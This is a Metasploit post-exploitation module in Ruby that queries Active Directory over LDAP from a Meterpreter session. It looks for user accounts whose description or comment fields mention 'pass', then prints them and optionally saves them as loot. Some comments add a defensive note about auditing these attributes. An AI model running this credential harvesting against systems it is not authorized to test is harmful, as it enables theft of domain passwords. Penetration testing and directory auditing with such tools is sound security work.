GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/gather/enum_ad_user_comments.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Post module that issues one LDAP search from an existing Meterpreter session
# and tabulates the user objects whose description or comment attribute
# matches the configured filter.
#
# Defensive takeaway: as the module description itself notes, passwords are
# sometimes left in these free-text attributes. Audit description/comment
# values across the directory and move any credentials out of them. These
# attributes are commonly readable well beyond administrators (confirm against
# your own ACLs).
class MetasploitModule < Msf::Post
  include Msf::Auxiliary::Report
  include Msf::Post::Windows::LDAP

  # Declares the module metadata and registers the STORE_LOOT, FIELDS and
  # FILTER options.
  #
  # @param info [Hash] metadata passed in by the caller and merged through
  #   update_info before being handed to the superclass
  def initialize(info = {})
    metadata = update_info(
      info,
      'Name' => 'Windows Gather Active Directory User Comments',
      'Description' => %q{
        This module will enumerate user accounts in the default Active Domain (AD) directory which
        contain 'pass' in their description or comment (case-insensitive) by default. In some cases,
        such users have their passwords specified in these fields.
      },
      'License' => MSF_LICENSE,
      'Author' => [ 'Ben Campbell' ],
      'Platform' => [ 'win' ],
      'SessionTypes' => [ 'meterpreter' ],
      'References' => [
        ['URL', 'http://social.technet.microsoft.com/wiki/contents/articles/5392.active-directory-ldap-syntax-filters.aspx'],
      ]
    )
    super(metadata)

    # The default FILTER matches any description/comment containing 'pass',
    # so hits need manual review before being treated as credentials.
    register_options(
      [
        OptBool.new('STORE_LOOT', [true, 'Store file in loot.', false]),
        OptString.new('FIELDS', [true, 'Fields to retrieve.', 'userPrincipalName,sAMAccountName,userAccountControl,comment,description']),
        OptString.new('FILTER', [true, 'Search filter.', '(&(&(objectCategory=person)(objectClass=user))(|(description=*pass*)(comment=*pass*)))']),
      ]
    )
  end

  # Runs the search, prints the matches as a table and, when STORE_LOOT is
  # set, saves the same table as CSV loot.
  #
  # Returns early without output when the query yields nil or no results, and
  # after printing the error message when the query raises RuntimeError or a
  # Meterpreter RequestError.
  #
  # NOTE(review): MAX_SEARCH is read here but not registered in this file and
  # `query` is not defined here; both presumably come from the included LDAP
  # mixin. Confirm against the mixin.
  #
  # Handling note: the table holds raw attribute values, which may include
  # plaintext passwords. It is printed to the console and optionally written
  # to loot as text/plain, so treat both as sensitive engagement data.
  def run
    # Whitespace is stripped from the whole option value before splitting on
    # commas, so the order of these two steps matters.
    field_list = datastore['FIELDS'].gsub(/\s+/, '')
    fields = field_list.split(',')
    ldap_filter = datastore['FILTER']
    limit = datastore['MAX_SEARCH']

    begin
      response = query(ldap_filter, limit, fields)
      return if response.nil? || response[:results].empty?
    rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => error
      # Raised when the bind fails or the network only has limited accounts.
      print_error(error.message)
      return
    end

    # The table stores the raw string values, one column per requested field.
    table = Rex::Text::Table.new(
      'Header' => 'Domain Users',
      'Indent' => 1,
      'SortIndex' => -1,
      'Columns' => fields
    )

    response[:results].each do |entry|
      # A nil attribute value becomes an empty cell.
      table << entry.map { |attribute| attribute[:value].nil? ? '' : attribute[:value] }
    end

    print_line(table.to_s)

    return unless datastore['STORE_LOOT']

    loot_path = store_loot('ad.users', 'text/plain', session, table.to_csv)
    print_good("Results saved to: #{loot_path}")
  end
end